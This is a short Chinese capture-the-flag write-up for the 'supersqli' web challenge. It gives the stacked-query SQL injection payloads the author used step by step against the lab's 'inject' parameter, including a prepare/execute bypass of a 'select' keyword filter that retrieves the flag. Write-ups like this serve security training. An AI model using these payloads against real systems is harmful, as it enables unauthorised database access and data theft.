攻防世界WP-web-supersqli

在这里插入图片描述这是一道sql注入的题目。首先在输入框输入1和2,能够分别返回查询数据。可以看到urlhttp://220.249.52.133:31003/?inject=1,初步推断inject为注入点。
我们输入1',报错。
在这里插入图片描述之前有考虑用sqlmap来做,但是没做出来= = ,网页源代码里面也有提示<!-- sqlmap是没有灵魂的 -->,但是从sqlmap的结果可以知道,使用的databasesupersqli
尝试手工注入。
首先查看有哪些数据库1';show databases;#
在这里插入图片描述有两个数据库比较可疑,ctftrainingsupersqli
先来看看ctftraining,查询一下它的表1';use ctftraining;show tables;#
在这里插入图片描述继续。1';use ctftraining;show columns from FLAG_TABLE;#
在这里插入图片描述提示not_flag,估计flag不在里面,不过也试一下。
1';use ctftraining;sEt @sql=concat('se','lect * from & FLAG_TABLE;');prEpare stmt from @sql;execute stmt;其他几个表也查过了,没有东西。
然后看另外一个database,supersqli
1';show tables;#
在这里插入图片描述查询第一个table
1';sEt @sql=concat('se','lect * from 1919810931114514 ;');Prepare stmt from @sql;execute stmt;就得到了flag
最开始直接使用 select ,发现select被过滤,然后尝试大小写绕过,替换t为\x74都不行。最后用的这种预处理的方法执行sql语句。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值